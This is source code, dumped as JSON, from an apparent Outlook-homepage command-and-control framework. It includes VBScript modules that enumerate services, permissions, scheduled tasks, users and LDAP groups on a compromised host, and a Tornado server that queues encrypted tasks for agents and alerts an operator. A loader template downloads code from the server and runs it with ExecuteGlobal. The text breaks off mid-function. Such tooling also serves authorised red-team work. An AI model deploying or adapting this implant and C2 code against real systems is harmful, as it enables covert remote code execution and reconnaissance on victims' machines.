AllowDemandStart: \" & objSettings.AllowDemandStart\r\n\t\tschedtasks = schedtasks & vbCrLf & \" AllowHardTerminate: \" & objSettings.AllowHardTerminate\r\n\t\tschedtasks = schedtasks & vbCrLf & \" Compatibility: \" & objSettings.Compatibility\r\n\t\tschedtasks = schedtasks & vbCrLf & \" DeleteExpiredTaskAfter: \" & objSettings.DeleteExpiredTaskAfter\r\n\t\tschedtasks = schedtasks & vbCrLf & \" DisallowStartIfOnBatteries: \" & objSettings.DisallowStartIfOnBatteries\r\n\t\tschedtasks = schedtasks & vbCrLf & \" Enabled: \" & objSettings.Enabled\r\n\t\tschedtasks = schedtasks & vbCrLf & \" ExecutionTimeLimit: \" & objSettings.ExecutionTimeLimit\r\n\t\tschedtasks = schedtasks & vbCrLf & \" Hidden: \" & objSettings.Hidden\r\n\t\tschedtasks = schedtasks & vbCrLf & \" IdleSettings: \" & objSettings.IdleSettings\r\n\t\tschedtasks = schedtasks & vbCrLf & \" MultipleInstances: \" & objSettings.MultipleInstances\r\n\t\tschedtasks = schedtasks & vbCrLf & \" Priority: \" & objSettings.Priority\r\n\t\tschedtasks = schedtasks & vbCrLf & \" RestartCount: \" & objSettings.RestartCount\r\n\t\tschedtasks = schedtasks & vbCrLf & \" RestartInterval: \" & objSettings.RestartInterval\r\n\t\tschedtasks = schedtasks & vbCrLf & \" RunOnlyIfIdle: \" & objSettings.RunOnlyIfIdle\r\n\t\tschedtasks = schedtasks & vbCrLf & \" StartWhenAvailable: \" & objSettings.StartWhenAvailable\r\n\t\tschedtasks = schedtasks & vbCrLf & \" StopIfGoingOnBatteries: \" & objSettings.StopIfGoingOnBatteries\r\n\t\tschedtasks = schedtasks & vbCrLf & \" WakeToRun: \" & objSettings.WakeToRun\r\n\t\tSet objSettings = Nothing\r\n\t\tschedtasks = schedtasks & vbCrLf & \"Settings: \" & objItem.Settings\r\n\t\tschedtasks = schedtasks & vbCrLf & \"Triggers Details:\"\r\n\t\tFor Each objTrigger In objItem.Triggers\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" Id: \" & objTrigger.Id\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" RandomDelay: \" & objTrigger.RandomDelay\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" DaysInterval: \" & objTrigger.DaysInterval\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" StartBoundary: \" & objTrigger.StartBoundary\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" Enabled: \" & objTrigger.Enabled\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" StateChange: \" & objTrigger.StateChange\r\n\t\t\t\r\n\t\t\tSet objRepetition = objTrigger.Repetition\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" Repetition Details: \"\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" StopAtDurationEnd: \" & objRepetition.StopAtDurationEnd\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" Duration: \" & objRepetition.Duration\r\n\t\t\tschedtasks = schedtasks & vbCrLf & \" Interval: \" & objRepetition.Interval\r\n\t\t\tset objRepetition = Nothing\r\n\t\tNext\r\n schedtasks = schedtasks & vbCrLf\r\n\tNext\r\n\tlist_scheduledtasks = schedtasks\r\nEnd Function" }, { "path": "functions/enumerate/host/list_servicepermissions.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the services and the permissions on the host. \n\n It lists out:\n - Service Name\n - Service Binary path\n - Group name and Access\n \n Example Output: \n Enumerating Permissions for: UserDataSvc_3dc16\n C:\\Windows\\system32\\svchost.exe\n GROUP: NT SERVICE\\TRUSTEDINSTALLER\n binPath: C:\\Windows\\system32\\svchost.exe\n Sanity Check - Access Mask Value To Match: 2032127\n ACE Type: Allow\n Access Mask (Decimal): 2032127 (FullControl)\n \n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: Select * from Win32_Service\n - Query: Select * from win32_logicalFileSecuritySetting WHERE Path=VARIABLE\n \"\"\" \n self.entry = 'list_servicepermissions'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_servicepermissions.txt", "content": "Function list_servicepermissions()\r\n\t' ACE Types\r\n\r\n\tConst ACCESS_ALLOWED_ACE_TYPE = &h0\r\n\tConst ACCESS_DENIED_ACE_TYPE = &h1\r\n\r\n\t' Base Access Mask values\r\n\r\n\tConst FILE_READ_DATA = &h1\r\n\tConst FILE_WRITE_DATA = &h2\r\n\tConst FILE_APPEND_DATA = &h4\r\n\tConst FILE_READ_EA = &h8\r\n\tConst FILE_WRITE_EA = &h10\r\n\tConst FILE_EXECUTE = &h20\r\n\tConst FILE_DELETE_CHILD = &h40\r\n\tConst FILE_READ_ATTRIBUTES = &h80\r\n\tConst FILE_WRITE_ATTRIBUTES = &h100\r\n\tConst FOLDER_DELETE = &h10000\r\n\tConst READ_CONTROL = &h20000\r\n\tConst WRITE_DAC = &h40000\r\n\tConst WRITE_OWNER = &h80000\r\n\tConst SYNCHRONIZE = &h100000\r\n\r\n\t' Constructed Access Masks\r\n\r\n\tDim FULL_CONTROL\r\n\tFULL_CONTROL = FILE_READ_DATA + FILE_WRITE_DATA + FILE_APPEND_DATA + _\r\n\t\tFILE_READ_EA + FILE_WRITE_EA + FILE_EXECUTE + FILE_DELETE_CHILD + _\r\n\t\tFILE_READ_ATTRIBUTES + FILE_WRITE_ATTRIBUTES + FOLDER_DELETE + _\r\n\t\tREAD_CONTROL + WRITE_DAC + WRITE_OWNER + SYNCHRONIZE\r\n\r\n\tDim READ_ONLY\r\n\tREAD_ONLY = FILE_READ_DATA + FILE_READ_EA + FILE_EXECUTE + _\r\n\t\tFILE_READ_ATTRIBUTES + READ_CONTROL + SYNCHRONIZE\r\n\r\n\tDim MODIFY\r\n\tMODIFY = FILE_READ_DATA + FILE_WRITE_DATA + FILE_APPEND_DATA + _\r\n\t\tFILE_READ_EA + FILE_WRITE_EA + FILE_EXECUTE + _\r\n\t\tFILE_READ_ATTRIBUTES + _\r\n\t\tFILE_WRITE_ATTRIBUTES + FOLDER_DELETE + READ_CONTROL + SYNCHRONIZE\r\n\r\n\r\n\tDim strRights\r\n\tDim intAccessMask\r\n\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n\tSet col = objWMIService.ExecQuery (\"Select * from Win32_Service\")\r\n\r\n\tFor Each objService in col\r\n\t\tif InStr(objService.PathName,\"{\") then\r\n\t\t\tbinarray = split(objService.PathName, \" \", -1, 1)\r\n\t\t\tbinpathStr = binarray(0)\r\n\t\telseif InStr(objService.PathName,\"-\") then\r\n\t\t\tbinarray = split(objService.PathName, \"-\", -1, 1)\r\n\t\t\tbinpathStr = binarray(0)\r\n\t\telseif InStr(objService.PathName,\"/\") then\r\n\t\t\tbinarray = split(objService.PathName, \"/\", -1, 1)\r\n\t\t\tbinPathStr = Replace(binarray(0), chr(34), \"\")\r\n\t\t\tbinpathStr = binarray(0)\r\n\t\telse\r\n\t\t\tbinpathStr = objService.PathName\r\n\t\tend if\r\n \r\n\t\tsanbin = trim(Replace(binarray(0), chr(34), \"\"))\r\n\t\ttoreturn = toreturn & \"Enumerating Permissions for: \" & objService.Name & vbCrLf\r\n\t\ttoreturn = toreturn & sanbin & vbCrLf\r\n\t\t\r\n\t\tstrDir = Replace(sanbin,\"\\\",\"\\\\\")\r\n\t\tSet colACLs = objWMIService.ExecQuery(\"Select * from win32_logicalFileSecuritySetting WHERE Path='\" & strDir & \"'\",,48)\r\n\t\tfor each objItem in colACLs\r\n\t\t\tIf objItem.GetSecurityDescriptor(objSD) Then\r\n\t\t\t\tDisplayFileSecurity = False\r\n\t\t\tEnd If\r\n\r\n\t\t\tcolACEs = objSD.DACL\r\n\t\t\tfor each objACE in colACEs\r\n\t\t\t\tstrAccessList = objACE.Trustee.Domain & \"\\\" & objACE.Trustee.Name\r\n\t\t\t\t\r\n\t\t\t\tif left(strAccessList,1) = \"\\\" then\r\n\t\t\t\t\tstrAccessList = right(strAccessList,len(strAccessList) -1)\r\n\t\t\t\tend if\r\n\r\n\t\t\t\t\ttoreturn = toreturn & \" GROUP: \" & Ucase(strAccessList) & vbCrLf\r\n\t\t\t\t\ttoreturn = toreturn & vbTab & \"binPath: \" & Replace(strDir,\"\\\\\",\"\\\") & vbCrLf\r\n\r\n\t\t\t\t\tif objACE.AceType = 0 Then\r\n\t\t\t\t\t\t toreturn = toreturn & vbTab & \"Sanity Check - Access Mask Value To Match: \" & objACE.AccessMask & vbCrLf\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tIf objACE.ACEType = ACCESS_ALLOWED_ACE_TYPE Then\r\n\t\t\t\t\t\t\t\ttoreturn = toreturn & vbTab & \" ACE Type: Allow\" & vbCrLf\r\n\t\t\t\t\t\t\tElse\r\n\t\t\t\t\t\t\t\ttoreturn = toreturn & vbTab & \" ACE Type: Deny\" & vbCrLf\r\n\t\t\t\t\t\t\tEnd If\r\n\r\n\t\t\t\t\t\t\tstrRights = \"\"\r\n\t\t\t\t\t\t\tintAccessMask = objACE.AccessMask\r\n\r\n\t\t\t\t\t\t\tIf intAccessMask = FULL_CONTROL Then\r\n\t\t\t\t\t\t\t\tstrRights = \" (FullControl)\"\r\n\t\t\t\t\t\t\tElseIf intAccessMask = MODIFY Then\r\n\r\n\t\t\t\t\t\t\tstrRights = \" (Modify)\"\r\n\t\t\t\t\t\t\tElseIf intAccessMask = READ_ONLY Then\r\n\t\t\t\t\t\t\t\tstrRights = \" (ReadOnly)\"\r\n\t\t\t\t\t\t\tEnd If\r\n\r\n\t\t\t\t\t\t\ttoreturn = toreturn & vbTab & \" Access Mask (Decimal): \" & intAccessMask & strRights & vbCrLf\r\n\t\t\t\t\telseif objACE.AceType = 1 Then\r\n\t\t\t\t\t\ttoreturn = toreturn & vbTab & \"User does not have access - \" & objACE.AceType & vbCrLf\r\n\t\t\t\t\tend if\r\n\t\t\tNext \r\n\t\tNext\r\n\tNext\r\n\r\n\tlist_servicepermissions = toreturn & vbCrLf\r\nEnd Function" }, { "path": "functions/enumerate/host/list_services.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the services and status on the host. \n It lists out:\n - Service name\n - State (Stopped|Started)\n - Name (Name of the running account for the service)\n - BinPath\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: Select * from Win32_Service\n \"\"\"\n self.entry = 'list_services'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_services.txt", "content": "Function list_services()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n\tSet col = objWMIService.ExecQuery (\"Select * from Win32_Service\")\r\n\r\n\tFor Each objService in col \r\n\t\tservices = services & vbCrLf & objService.Name & vbCrLf & \" State:\" & objService.State & vbCrLf & \" Name: \" & objService.StartName & vbCrLf & \" BinPath:\" & objService.PathName\r\n\tNext\r\n\tlist_services = services\r\nEnd Function" }, { "path": "functions/enumerate/host/list_startmenu.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Lists the structure and items in the start menu.\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - Query: Select Name from Win32_LogicalProgramGroupItem\n \"\"\"\n self.entry = 'list_startmenu'\n self.depends = []\n super().__init__(templatepath)\n " }, { "path": "functions/enumerate/host/list_startmenu.txt", "content": "Function list_startmenu()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objWMIService = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n\tSet colItems = objWMIService.ExecQuery(\"Select Name from Win32_LogicalProgramGroupItem\")\r\n \r\n\tFor Each objItem in colItems\r\n\t\tlist_startmenu = list_startmenu & objItem.Name & vbCrLF\r\n\tNext\r\nEnd Function" }, { "path": "functions/enumerate/host/list_timezone.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\nfrom lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Finds the name of the current timezone for the agent\n\n It uses WbemScripting.SWbemNamedValueSet\n - Add.__ProviderArchitecture\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\cimv2)\n - ConnectServer(root\\cimv2).GetStringValue\n \"\"\"\n self.entry = 'list_timezone'\n self.depends = []\n super().__init__(templatepath)\n \n def rethandler(self, agent, options, data):\n agent.timezone = data" }, { "path": "functions/enumerate/host/list_timezone.txt", "content": "Function list_timezone()\r\n\tOn error resume next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objreg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\tobjreg.GetStringValue 2147483650, \"SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation\", \"TimeZoneKeyName\", strtimezone\r\n\tlist_timezone = strtimezone\r\nEnd Function" }, { "path": "functions/enumerate/host/list_whoami.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Whoami with limited information. Missing privileges since there is no way to get \n that without API access or running external binaries\n\n It uses CreateObject(\"Wscript.Shell\")\n It uses WbemScripting.SWbemLocator\n - ConnectServer(root\\directory\\LDAP)\n - Query: \"SELECT DS_memberOf FROM ds_user Where DS_sAMAccountName = '\" & strUsername & \"'\"\n\n - ConnectServer(root\\cimv2)\n - Query: \"SELECT * FROM Win32_UserProfile Where SID='\" & strSID & \"'\"\n \"\"\"\n self.entry = 'list_whoami'\n self.depends = []\n super().__init__(templatepath)\n\n def rethandler(self, agent, options, data):\n for line in data.split(\"\\n\"):\n if line.startswith(\"SID:\"):\n sid = line.split()[1]\n if sid:\n agent.sid = sid" }, { "path": "functions/enumerate/host/list_whoami.txt", "content": "Function list_whoami()\r\n\ton error resume next\r\n\tSet objShell = window.external.OutlookApplication.CreateObject(\"WScript.Shell\")\r\n\r\n\toutput = \"USER INFORMATION\" & vbCrLF\r\n\toutput = output & \"----------------\" & vbCrLF\r\n\r\n\tstrUsername = objShell.RegRead(\"HKEY_CURRENT_USER\\Volatile Environment\\username\")\r\n\tstrUserDNSDomain = objShell.RegRead(\"HKEY_CURRENT_USER\\Volatile Environment\\userdnsdomain\")\r\n\tstrUserDomain = objShell.RegRead(\"HKEY_CURRENT_USER\\Volatile Environment\\userdomain\")\r\n\tif strUserDNSDomain = \"\" then\r\n\t\tstrUserDNSDomain \"WORKGROUP\"\r\n\tend if\r\n\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objreg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\t\r\n\tobjreg.EnumKey 2147483651, \"\", arrSubKeys\r\n\tFor Each strSubKey In arrSubKeys\r\n\t\tIf Left(strSubKey, 6) = \"S-1-5-\" Then\r\n\t\t\tstrVolatileEnvKeyPath = strSubKey & \"\\Volatile Environment\"\r\n\t\t\tstrVolatileEnvValueName = \"USERNAME\"\r\n\t\t\tobjreg.GetStringValue 2147483651, strVolatileEnvKeyPath, strVolatileEnvValueName, strUserValue\r\n\t\t\tIf StrComp(strUserValue, strUsername, vbTextCompare) = 0 Then\r\n\t\t\t\tstrSID = strSubKey\r\n\t\t\t\tExit For\r\n\t\t\tEnd If\r\n\t\tEnd If\r\n\tNext\r\n\r\n\toutput = output & \"Username: \" & strUsername & vbCrLF\r\n\toutput = output & \"DNS Domain: \" & strUserDNSDomain & vbCrLF\r\n\toutput = output & \"Domain: \" & strUserDomain & vbCrLF\r\n\toutput = output & \"SID: \" & strSID & vbCrLF\r\n\toutput = output & vbCrLF\r\n\toutput = output & \"GROUP INFORMATION\" & vbCrLF\r\n\toutput = output & \"----------------\" & vbCrLF\r\n\r\n\tSet objLDAP = objLocator.ConnectServer(\".\", \"\\root\\directory\\LDAP\")\r\n\tSet colItems = objLDAP.ExecQuery(\"SELECT DS_memberOf FROM ds_user Where DS_sAMAccountName = '\" & strUsername & \"'\")\r\n\t\r\n\tFor Each PATH in colItems\r\n\t\tFor Each pathAttribute in PATH.Properties_\r\n\t\t\tSelect Case TypeName(pathAttribute.value)\r\n\t\t\t\tcase \"String\"\r\n\t\t\t\t\tReturndata = Returndata & pathAttribute.name & \":\" & pathAttribute.value & vbCrLf\r\n\t\t\t\tcase \"Long\"\r\n\t\t\t\t\tReturndata = Returndata & pathAttribute.name & \":\" & pathAttribute.value & vbCrLf\r\n\t\t\t\tcase \"Boolean\"\r\n\t\t\t\t\tReturndata = Returndata & pathAttribute.name & \":\" & pathAttribute.value & vbCrLf\r\n\t\t\t\tcase \"SWbemObjectEx\"\r\n\t\t\t\t\t'Cannot get this work...\r\n\t\t\t\t\t'Returndata = Returndata & pathAttribute.name & vbCrLf\r\n\t\t\t\tcase \"Variant()\"\r\n\t\t\t\t\tReturndata = Returndata & pathAttribute.name & \"::\" & Join(pathAttribute.value, \",\") & vbCrLf\r\n\t\t\tEnd Select\r\n\t\tNext\r\n\tNext\r\n\toutput = output & Returndata & vbCrLF\r\n\r\n\toutput = output & \"OTHER INFORMATION\" & vbCrLF\r\n\toutput = output & \"----------------------\" & vbCrLF\r\n\r\n\tSet objwmi = objLocator.ConnectServer(\".\", \"root\\cimv2\")\r\n\tSet userStateInfo = objwmi.ExecQuery(\"SELECT * FROM Win32_UserProfile Where SID='\" & strSID & \"'\")\r\n\tFor Each userInfo in userStateInfo\r\n\t\toutput = output & \"RoamingConfigured: \" & userInfo.RoamingConfigured & vbCrLF\r\n\t\toutput = output & \"RoamingPath: \" & userInfo.RoamingPath & vbCrLF\r\n\t\toutput = output & \"LocalPath: \" & userInfo.LocalPath & vbCrLF\r\n\tNext\r\n\r\n\tlist_whoami = output\r\nEnd Function" }, { "path": "functions/enumerate/host/list_windowsarch.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the Windows Architecture on the host. \n This module writes the result to agent in the database.\n Arch value is found under:\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment - PROCESSOR_ARCHITECTURE.\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer\n - ConnectServer(root\\cimv2).GetStringValue\n \"\"\"\n self.entry = 'list_windowsarch'\n self.depends = []\n super().__init__(templatepath)\n \n def rethandler(self, agent, options, data):\n agent.windowsarch = data" }, { "path": "functions/enumerate/host/list_windowsarch.txt", "content": "Function list_windowsarch()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objreg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\tobjreg.GetStringValue 2147483650, \"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\", \"PROCESSOR_ARCHITECTURE\", strArch\r\n\tif strArch = \"AMD64\" Then\r\n\t\tlist_windowsarch = \"x64\"\r\n\telse\r\n\t\tlist_windowsarch = strArch\r\n\tend if\r\nEnd Function\r\n" }, { "path": "functions/enumerate/host/list_windowsversion.py", "content": "from lib.core.specmodule import SpecModule\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n Enumerates the Current Windows version on the host.\n It retrieves data from HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion and lists out:\n - ProductName\n - ReleaseId\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer\n - ConnectServer(root\\cimv2).GetStringValue\n \"\"\"\n self.entry = 'list_windowsversion'\n self.depends = []\n super().__init__(templatepath)\n \n def rethandler(self, agent, options, data):\n agent.windowsversion = data" }, { "path": "functions/enumerate/host/list_windowsversion.txt", "content": "Function list_windowsversion()\r\n\tOn Error Resume Next\r\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\r\n\tSet objreg = objLocator.ConnectServer(\".\", \"root\\cimv2\").Get(\"StdRegProv\")\r\n\tobjreg.GetStringValue 2147483650, \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\", \"ProductName\", strProdName\r\n\tobjreg.GetStringValue 2147483650, \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\", \"ReleaseId\", strRelId\r\n\tlist_windowsversion = strProdName & \" - \" & strRelId\r\nEnd Function\r\n" }, { "path": "functions/enumerate/ldap/ldap_query.py", "content": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,escapequotes\n\n\nclass Spec(SpecModule):\n def __init__(self, templatepath, helpers):\n self.options = {}\n self.helpers = helpers\n self.help = \"\"\"\n A module to query LDAP with. To find a list of attributes/values to query use WMI Explorer and look under ROOT\\directory\\LDAP.\n Some classes: ds_domain, ds_computer , ds_container , ds_group , ds_top , ds_user \n Currently not getting all attributes. Struggling with SWbemObjectEx sub objects.\n\n The WHERE_* is only used if they are specified. \n A query without WHERE_* specified looks like this:\n SELECT FROM WHERE = ''\n\n It uses WbemScripting.SWbemLocator\n - ConnectServer(\\\\root\\\\directory\\\\LDAP)\n - Query: SELECT \n \n \n\n\n" }, { "path": "lib/handlers/specapplication.py", "content": "#we are not able to directly initialize RequestHandler objects for single time initilization actions\n#This RequestHandler objects can access anything in the application class via self.application\n#Therefore we do shared single initilization here\n#validated from top level\nimport tornado.web\n\nclass speculaApplication(tornado.web.Application):\n def __init__(self, helpers, handlers = None, default_host = None, transforms = None, **settings):\n self.helpers = helpers\n super().__init__(handlers, default_host, transforms, **settings)\n" }, { "path": "lib/handlers/speccomms.py", "content": "import copy\r\nimport jinja2\r\nfrom urllib.parse import unquote, urlparse\r\nfrom lib.core.specagents import AgentClass\r\nfrom lib.core.utility import encrypt_code, decrypt_code, TaskClass\r\nimport tornado\r\nimport random\r\nfrom datetime import datetime\r\nfrom lib.core.setup import gconfig\r\nDLName = \"DownloadCacheLogic\"\r\nLOADSUPPORT = \"\"\"\r\nSub {} ()\r\n\t\tSet server_manager = window.external.OutlookApplication.CreateObject(\"MSXML2.ServerXMLHTTP\")\r\n\t\tvr = Left(window.external.OutlookApplication.version,4)\r\n\t\tserver_manager.open \"GET\", \"{}\", False\r\n\t\tserver_manager.setRequestHeader \"User-Agent\", \"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; WOW64; Trident/7.0; Specula; Microsoft Outlook \" & vr\r\n\t\tserver_manager.send\r\n\t\trp = server_manager.ResponseText\r\n ExecuteGlobal rp\r\nEnd Sub\r\n\"\"\"\r\n\r\n#encrypt 1||0 Left(msg 1)\r\n#refreshtime len 4 int Mid (msg, 2, 4)\r\n#code Mid(msg 6)\r\nr = random.Random()\r\nclass AgentComHandler(tornado.web.RequestHandler):\r\n def set_default_headers(self):\r\n self.set_header('Server', gconfig.SERVER_HEADER)\r\n\r\n def get(self):\r\n user_agent = self.request.headers.get(\"User-Agent\")\r\n url = self.request.full_url()\r\n uri = self.request.uri\r\n remote_ip = self.request.remote_ip\r\n handled = False\r\n \r\n self.application.helpers.speclog(\"*** [INBOUND GET] (\" + remote_ip + \") - [URL]: \" + self.request.full_url())\r\n if self.application.helpers.inblocklist(remote_ip):\r\n self.application.helpers.speclog('*** [blocklisted IP] ({}): Valid GET endpoint request from blocklisted ip'.format(remote_ip))\r\n self.render('blocklist.html',\r\n CLSID=gconfig.CLSID)\r\n return\r\n elif 'Outlook' in user_agent:\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \"): Valid Useragent\")\r\n agent: AgentClass # type anotation\r\n if self.application.helpers.pastenddate(): # Handler for past end date\r\n for agent in self.application.helpers.a_list:\r\n if urlparse(agent.url).path == uri: \r\n self.set_header(\"Cache-Control\", \"no-store\")\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Unique Agent URL triggered\")\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Updating Lastseen, Useragent and callback count\")\r\n agent.update_callback()\r\n agent.lastcheckin = datetime.now().strftime(self.application.helpers.timeformat)\r\n agent.useragent = user_agent\r\n handled = True\r\n self.application.helpers.speclog(\"*** [ENDDATE] (\" + remote_ip + \"): Tasking remove homepage hook\")\r\n mod = self.application.helpers.get_module('execute/host/remove_homepage')\r\n task = TaskClass('execute/host/remove_homepage',\r\n self.application.helpers.renderModule(mod, agent),\r\n mod.entry,\r\n {},\r\n True)\r\n agent.add_task(task)\r\n self.render('base.html',\r\n REFRESH_TIME=self.application.helpers.addJitter(agent.jitter, agent.refreshtime),\r\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\r\n LOADSUPPORT=LOADSUPPORT.format(DLName, agent.supporturl),\r\n DLSUPPORT=DLName,\r\n CLSID=gconfig.CLSID)\r\n return\r\n for agent in self.application.helpers.a_list:\r\n #Doing urlparse to compare only the url and not hostname\r\n if urlparse(agent.codeurl).path == uri: #Code url - server encrypted vbscode\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Requesting Encrypted Code\")\r\n self.set_header(\"Cache-Control\", \"no-store\")\r\n agent.update_callback()\r\n agent.lastcheckin = datetime.now().strftime(self.application.helpers.timeformat)\r\n if gconfig.PUSHOVER_API_TOKEN != None:\r\n if agent.pushnextcallback:\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Push on next callback enabled - sending push to the sweet operator\")\r\n self.application.helpers.sendPush(agent.remoteip, agent.hostname,\r\n \"Agent called back and you wanted to be notified\")\r\n agent.pushnextcallback = False # Turning off push on next callback\r\n else:\r\n if agent.pushnextcallback:\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Push on next callback enabled - However no pushover key specified\")\r\n agent.pushnextcallback = False # Turning off push on next callback\r\n if len(agent.tasks) > 0:\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Found queued task to execute - \" + agent.tasks[0].name)\r\n code = agent.tasks[0].code\r\n if agent.tasks[0].encrypt:\r\n self.write(\"1\")\r\n code = encrypt_code(code, agent.encryptionkey)\r\n else:\r\n self.write(\"0\")\r\n self.write(self.application.helpers.addJitter(agent.jitter, agent.refreshtime).zfill(4))\r\n self.write(code)\r\n handled = True\r\n else:\r\n self.write(\"2\") # is this the best option?\r\n self.write(self.application.helpers.addJitter(agent.jitter, agent.refreshtime).zfill(4))\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): No queued task to execute\")\r\n handled = True\r\n break\r\n if urlparse(agent.supporturl).path == uri:\r\n with open('helperFunctions/supportFuncs.txt') as fp:\r\n data = fp.read()\r\n env = jinja2.Environment(autoescape=False)\r\n doc = env.from_string(data)\r\n self.write(doc.render({\r\n \"CODEURL\": agent.codeurl,\r\n \"REFRESH_TIME\": agent.refreshtime,\r\n \"ENCRYPTIONKEY_LOCATION\": gconfig.ENCRYPTIONKEY_REGISTRY_LOCATION,\r\n \"ENCRYPTIONKEY_VALUENAME\": gconfig.ENCRYPTIONKEY_VALUENAME\r\n })\r\n )\r\n handled = True\r\n break\r\n if urlparse(agent.url).path == uri: #Unique url per agent\r\n self.set_header(\"Cache-Control\", \"no-store\")\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Unique Agent URL triggered\")\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Updating Lastseen, Useragent and callback count\")\r\n agent.update_callback()\r\n agent.lastcheckin = datetime.now().strftime(self.application.helpers.timeformat)\r\n agent.useragent = user_agent\r\n if agent.remoteip == \"10.10.10.10\": ## This is the task for prestaged clients to update db info\r\n if agent.prestaged != True: # we flip this after the the first callin cycle\r\n if gconfig.PUSH_UNEXPECTEDCALLBACK == \"True\":\r\n self.application.helpers.sendPush(remote_ip, \"None\", \"[!] Unexpected Prestaged callback\")\r\n handled = True\r\n self.render('base.html',\r\n OUTLOOK_VIEW_ID=gconfig.OUTLOOK_VIEW_ID,\r\n LOADSUPPORT=\"\",\r\n DLSUPPORT=\"\",\r\n CLSID=gconfig.CLSID)\r\n break\r\n else:\r\n self.application.helpers.speclog(\"*** [AGENTCOM] (\" + remote_ip + \") (\" + agent.hostname + \"): Prestaged agents first checkin, executing special task to update database\")\r\n mod = self.application.helpers.get_module('enumerate/host/list_basic')\r\n task = TaskClass('enumerate/host/list_basic',\r\n self.application.helpers.renderModule(mod, agent),\r\n mod.entry,\r\n {},\r\n True)\r\n agent.add_task(task)\r\n 